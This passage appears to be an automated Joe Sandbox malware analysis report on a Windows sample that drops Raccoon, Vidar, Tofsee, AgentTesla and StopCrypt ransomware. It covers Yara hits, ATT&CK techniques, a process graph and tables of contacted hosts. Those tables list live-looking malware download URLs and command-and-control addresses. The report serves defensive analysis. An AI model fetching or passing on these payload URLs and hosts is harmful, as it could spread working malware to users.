                      Source: Yara matchFile source: 11.2.jgdhbua.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000002.721727855.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000000.708255964.00000000044C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.776599972.00000000004F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.899701090.0000000002070000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.721690876.0000000000680000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002C.00000002.901276330.0000000002431000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.776791205.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
                      Yara detected Raccoon StealerShow sources
                      Source: Yara matchFile source: 00000027.00000003.861803378.0000000004EC0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000003.920806858.0000000004E40000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.922842020.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002F.00000002.1015911464.0000000004DA0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.1024642477.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 0000000F.00000002.775841578.00000000007F9000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 17.3.D936.exe.22d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.svchost.exe.e70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.svchost.exe.e70000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.3.krmdinzg.exe.7c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.7c0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.D936.exe.22b0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.krmdinzg.exe.7c0000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.800983655.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000003.798724710.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.796450954.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.1024071704.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.800731759.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.797091655.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000003.779473426.00000000022D0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000020.00000002.801019606.00000000007C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: D936.exe PID: 7124, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: krmdinzg.exe PID: 6888, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3000, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\D936.exeCode function: 17_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                      Source: C:\Windows\SysWOW64\qeprvgom\krmdinzg.exeCode function: 32_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1Native API531DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools211Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsExploitation for Client Execution1Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsCommand and Scripting Interpreter3Windows Service14Access Token Manipulation1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsService Execution3Logon Script (Mac)Windows Service14Software Packing43NTDSSystem Information Discovery327Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol5SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptProcess Injection713Timestomp1LSA SecretsSecurity Software Discovery651SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol36Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncVirtualization/Sandbox Evasion231Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading131Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronVirtualization/Sandbox Evasion231Input CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdProcess Injection713KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                      Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskHidden Files and Directories1GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553404 Sample: ECD2MpEBSf.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 82 185.163.204.24, 49912, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany 2->82 84 86.107.197.138, 38133, 49892 MOD-EUNL Romania 2->84 86 10 other IPs or domains 2->86 106 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->106 108 Antivirus detection for URL or domain 2->108 110 Antivirus detection for dropped file 2->110 112 20 other signatures 2->112 11 ECD2MpEBSf.exe 2->11         started        14 krmdinzg.exe 2->14         started        16 jgdhbua 2->16         started        18 5 other processes 2->18 signatures3 process4 signatures5 144 Contains functionality to inject code into remote processes 11->144 146 Injects a PE file into a foreign processes 11->146 20 ECD2MpEBSf.exe 11->20         started        148 Detected unpacking (changes PE section rights) 14->148 150 Detected unpacking (overwrites its own PE header) 14->150 152 Writes to foreign memory regions 14->152 154 Allocates memory in foreign processes 14->154 23 svchost.exe 14->23         started        156 Machine Learning detection for dropped file 16->156 26 jgdhbua 16->26         started        28 WerFault.exe 18->28         started        process6 dnsIp7 134 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 20->134 136 Maps a DLL or memory area into another process 20->136 138 Checks if the current machine is a virtual machine (disk enumeration) 20->138 30 explorer.exe 10 20->30 injected 88 microsoft-com.mail.protection.outlook.com 104.47.53.36, 25, 49828 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 23->88 90 patmushta.info 94.142.143.116, 443, 49838, 49923 IHOR-ASRU Russian Federation 23->90 140 System process connects to network (likely due to code injection or exploit) 23->140 142 Creates a thread in another existing process (thread injection) 26->142 signatures8 process9 dnsIp10 92 185.233.81.115, 443, 49789 SUPERSERVERSDATACENTERRU Russian Federation 30->92 94 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands 30->94 96 11 other IPs or domains 30->96 74 C:\Users\user\AppData\Roaming\jgdhbua, PE32 30->74 dropped 76 C:\Users\user\AppData\Local\Temp\FB58.exe, PE32 30->76 dropped 78 C:\Users\user\AppData\Local\Temp3A9.exe, PE32 30->78 dropped 80 12 other malicious files 30->80 dropped 98 System process connects to network (likely due to code injection or exploit) 30->98 100 Benign windows process drops PE files 30->100 102 Deletes itself after installation 30->102 104 Hides that the sample has been downloaded from the Internet (zone.identifier) 30->104 35 CCB2.exe 30->35         started        38 D936.exe 2 30->38         started        41 3D34.exe 3 30->41         started        43 BB8A.exe 30->43         started        file11 signatures12 process13 file14 114 Detected unpacking (changes PE section rights) 35->114 116 Detected unpacking (overwrites its own PE header) 35->116 118 Found evasive API chain (may stop execution after checking mutex) 35->118 132 4 other signatures 35->132 70 C:\Users\user\AppData\Local\...\krmdinzg.exe, PE32 38->70 dropped 120 Machine Learning detection for dropped file 38->120 122 Uses netsh to modify the Windows network and firewall settings 38->122 124 Modifies the windows firewall 38->124 45 cmd.exe 1 38->45         started        48 cmd.exe 2 38->48         started        50 sc.exe 38->50         started        56 3 other processes 38->56 126 Antivirus detection for dropped file 41->126 128 Multi AV Scanner detection for dropped file 41->128 130 Injects a PE file into a foreign processes 41->130 52 3D34.exe 41->52         started        54 WerFault.exe 23 9 43->54         started        signatures15 process16 file17 72 C:\Windows\SysWOW64\...\krmdinzg.exe (copy), PE32 45->72 dropped 58 conhost.exe 45->58         started        60 conhost.exe 48->60         started        62 conhost.exe 50->62         started        64 conhost.exe 56->64         started        66 conhost.exe 56->66         started        68 conhost.exe 56->68         started        process18

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      ECD2MpEBSf.exe36%VirustotalBrowse
                      ECD2MpEBSf.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\888A.exe100%AviraHEUR/AGEN.1212012
                      C:\Users\user\AppData\Local\Temp\CADF.exe100%AviraHEUR/AGEN.1212012
                      C:\Users\user\AppData\Local\Temp\3D34.exe100%AviraHEUR/AGEN.1211353
                      C:\Users\user\AppData\Local\Temp\6C37.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\D936.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\krmdinzg.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\jgdhbua100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\CCB2.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\A332.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\3D34.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\A4DE.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\FB58.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\E3A9.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\D502.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\BB8A.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\9889.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\3D34.exe46%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\3D34.exe89%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      C:\Users\user\AppData\Local\Temp\6C37.exe50%ReversingLabsWin32.Infostealer.Generic
                      C:\Users\user\AppData\Local\Temp\A332.exe34%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\A332.exe77%ReversingLabsWin32.Ransomware.StopCrypt
                      C:\Users\user\AppData\Local\Temp\A4DE.exe35%ReversingLabsByteCode-MSIL.Trojan.Pwsx
                      C:\Users\user\AppData\Local\Temp\BB8A.exe46%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\BB8A.exe77%ReversingLabsWin32.Trojan.Raccoon
                      C:\Users\user\AppData\Local\Temp\FB58.exe34%MetadefenderBrowse
                      C:\Users\user\AppData\Local\Temp\FB58.exe77%ReversingLabsWin32.Ransomware.StopCrypt

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      1.0.ECD2MpEBSf.exe.400000.0.unpack100%AviraHEUR/AGEN.1123244Download File
                      11.0.jgdhbua.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.0.BB8A.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.3.D936.exe.22d0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      1.1.ECD2MpEBSf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      9.2.jgdhbua.6f15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.3D34.exe.ec0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      12.0.BB8A.exe.2080e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      17.2.D936.exe.22b0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      15.2.CCB2.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      32.2.krmdinzg.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      1.0.ECD2MpEBSf.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      18.0.3D34.exe.ec0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      1.0.ECD2MpEBSf.exe.400000.1.unpack100%AviraHEUR/AGEN.1123244Download File
                      1.2.ECD2MpEBSf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.2.BB8A.exe.2080e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      35.2.svchost.exe.e70000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      37.0.3D34.exe.150000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                      12.3.BB8A.exe.2090000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.ECD2MpEBSf.exe.400000.2.unpack100%AviraHEUR/AGEN.1123244Download File
                      15.3.CCB2.exe.7b0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      32.3.krmdinzg.exe.7c0000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                      1.0.ECD2MpEBSf.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.0.jgdhbua.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      1.0.ECD2MpEBSf.exe.400000.3.unpack100%AviraHEUR/AGEN.1123244Download File
                      12.0.BB8A.exe.2080e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      37.2.3D34.exe.150000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      12.2.BB8A.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      37.0.3D34.exe.150000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      1.0.ECD2MpEBSf.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      11.1.jgdhbua.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      32.2.krmdinzg.exe.6c0e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                      32.2.krmdinzg.exe.7c0000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                      0.2.ECD2MpEBSf.exe.5715a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      12.0.BB8A.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      37.0.3D34.exe.150000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                      17.2.D936.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                      18.2.3D34.exe.ec0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      18.0.3D34.exe.ec0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                      11.2.jgdhbua.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      37.0.3D34.exe.150000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                      18.0.3D34.exe.ec0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                      11.0.jgdhbua.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      15.2.CCB2.exe.680e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://www.disneyplus.com/legal/your-california-privacy-rights0%URL Reputationsafe
                      https://api.ip.sb/ip0%URL Reputationsafe
                      https://www.disneyplus.com/legal/privacy-policy0%URL Reputationsafe
                      http://unicupload.top/install5.exe100%URL Reputationphishing
                      http://185.163.204.24/0%Avira URL Cloudsafe
                      http://data-host-coin-8.com/files/7729_1642101604_1835.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/files/9030_1641816409_7037.exe100%Avira URL Cloudmalware
                      http://81.163.30.181/l2.exe100%Avira URL Cloudmalware
                      http://data-host-coin-8.com/game.exe0%URL Reputationsafe
                      http://185.163.204.24//l/f/RGwRWn4BZ2GIX1a3oIgO/7e7a36a98c7545dda4f314e30bbcbe9a8ba646520%Avira URL Cloudsafe
                      http://185.7.214.171:8080/6.php100%URL Reputationmalware
                      http://74.201.28.62/book/KB5009812.png0%Avira URL Cloudsafe
                      http://185.163.204.24//l/f/RGwRWn4BZ2GIX1a3oIgO/6bf5d5b41363c3e6b44705458de7ee6f935456db0%Avira URL Cloudsafe
                      https://disneyplus.com/legal.0%URL Reputationsafe
                      http://host-data-coin-11.com/0%URL Reputationsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      http://185.163.204.22/capibar100%Avira URL Cloudmalware
                      https://www.tiktok.com/legal/report/feedback0%URL Reputationsafe
                      http://74.201.28.62/book/KB5009812.exe0%Avira URL Cloudsafe
                      http://data-host-coin-8.com/files/6961_1642089187_2359.exe100%Avira URL Cloudmalware
                      http://help.disneyplus.com.0%URL Reputationsafe
                      http://81.163.30.181/l3.exe100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      unicupload.top
                      		54.38.220.85
                      		truefalse
                        		high
                        host-data-coin-11.com
                        		8.209.70.0
                        		truefalse
                          		high
                          github.com
                          		140.82.121.4
                          		truefalse
                            		high
                            patmushta.info
                            		94.142.143.116
                            		truefalse
                              		high
                              raw.githubusercontent.com
                              		185.199.108.133
                              		truefalse
                                		high
                                cdn.discordapp.com
                                		162.159.135.233
                                		truefalse
                                  		high
                                  microsoft-com.mail.protection.outlook.com
                                  		104.47.53.36
                                  		truefalse
                                    		high
                                    iplogger.org
                                    		148.251.234.83
                                    		truefalse
                                      		high
                                      goo.su
                                      		172.67.139.105
                                      		truefalse
                                        		high
                                        transfer.sh
                                        		144.76.136.153
                                        		truefalse
                                          		high
                                          data-host-coin-8.com
                                          		8.209.70.0
                                          		truefalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://unicupload.top/install5.exetrue
                                            • URL Reputation: phishing
                                            		unknown
                                            http://185.163.204.24/true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://data-host-coin-8.com/files/7729_1642101604_1835.exetrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://data-host-coin-8.com/files/9030_1641816409_7037.exetrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://81.163.30.181/l2.exetrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://data-host-coin-8.com/game.exefalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://185.163.204.24//l/f/RGwRWn4BZ2GIX1a3oIgO/7e7a36a98c7545dda4f314e30bbcbe9a8ba64652true
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://185.7.214.171:8080/6.phptrue
                                            • URL Reputation: malware
                                            		unknown
                                            http://74.201.28.62/book/KB5009812.pngtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://185.163.204.24//l/f/RGwRWn4BZ2GIX1a3oIgO/6bf5d5b41363c3e6b44705458de7ee6f935456dbtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://host-data-coin-11.com/false
                                            • URL Reputation: safe
                                            		unknown
                                            http://185.163.204.22/capibartrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://74.201.28.62/book/KB5009812.exetrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://data-host-coin-8.com/files/6961_1642089187_2359.exetrue
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://81.163.30.181/l3.exetrue
                                            • Avira URL Cloud: malware
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://www.disneyplus.com/legal/your-california-privacy-rightssvchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.ip.sb/ip3D34.exe, 00000012.00000002.833275323.00000000041F1000.00000004.00000001.sdmp, 3D34.exe, 00000012.00000002.833464312.0000000004361000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://www.disneyplus.com/legal/privacy-policysvchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://disneyplus.com/legal.svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://crl.ver)svchost.exe, 00000018.00000002.819053495.000002A078CEE000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            https://www.tiktok.com/legal/report/feedbacksvchost.exe, 00000018.00000003.794998457.000002A0795CA000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795071055.000002A0795B3000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795037619.000002A079592000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.795102955.000002A079A02000.00000004.00000001.sdmp, svchost.exe, 00000018.00000003.794951368.000002A0795CA000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://help.disneyplus.com.svchost.exe, 00000018.00000003.793604569.000002A07957B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            185.163.45.70
                                            		unknownMoldova Republic of
                                            		39798MIVOCLOUDMDfalse
                                            94.142.143.116
                                            		patmushta.infoRussian Federation
                                            		35196IHOR-ASRUfalse
                                            188.166.28.199
                                            		unknownNetherlands
                                            		14061DIGITALOCEAN-ASNUStrue
                                            172.67.139.105
                                            		goo.suUnited States
                                            		13335CLOUDFLARENETUSfalse
                                            74.201.28.62
                                            		unknownUnited States
                                            		35913DEDIPATH-LLCUStrue
                                            86.107.197.138
                                            		unknownRomania
                                            		39855MOD-EUNLfalse
                                            8.209.70.0
                                            		host-data-coin-11.comSingapore
                                            		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse
                                            54.38.220.85
                                            		unicupload.topFrance
                                            		16276OVHFRfalse
                                            162.159.135.233
                                            		cdn.discordapp.comUnited States
                                            		13335CLOUDFLARENETUSfalse
                                            104.47.53.36
                                            		microsoft-com.mail.protection.outlook.comUnited States
                                            		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                            144.76.136.153
                                            		transfer.shGermany
                                            		24940HETZNER-ASDEfalse
                                            81.163.30.181
                                            		unknownRussian Federation
                                            		58303IR-RASANAPISHTAZIRfalse
                                            185.233.81.115
                                            		unknownRussian Federation
                                            		50113SUPERSERVERSDATACENTERRUtrue
                                            185.7.214.171
                                            		unknownFrance
                                            		42652DELUNETDEtrue
                                            148.251.234.83
                                            		iplogger.orgGermany
                                            		24940HETZNER-ASDEfalse
                                            185.186.142.166
                                            		unknownRussian Federation
                                            		204490ASKONTELRUtrue
                                            185.163.204.22
                                            		unknownGermany
                                            		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEfalse
                                            185.163.204.24
                                            		unknownGermany
                                            		20771CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGEtrue

                                            Private

                                            IP
                                            192.168.2.1

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:553404
                                            Start date:14.01.2022
                                            Start time:20:27:34
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 15m 59s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:ECD2MpEBSf.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:48
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@58/27@91/19
                                            EGA Information:
                                            • Successful, ratio: 100%
                                            HDC Information:
                                            • Successful, ratio: 20.6% (good quality ratio 16%)
                                            • Quality average: 63%
                                            • Quality standard deviation: 39.5%
                                            HCA Information:
                                            • Successful, ratio: 60%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                            • TCP Packets have been reduced to 100
                                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.211.6.115, 40.91.112.76, 20.54.110.249, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 20.42.65.92
                                            • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdeus17.eastus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, microsoft.com, watson.telemetry.microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.
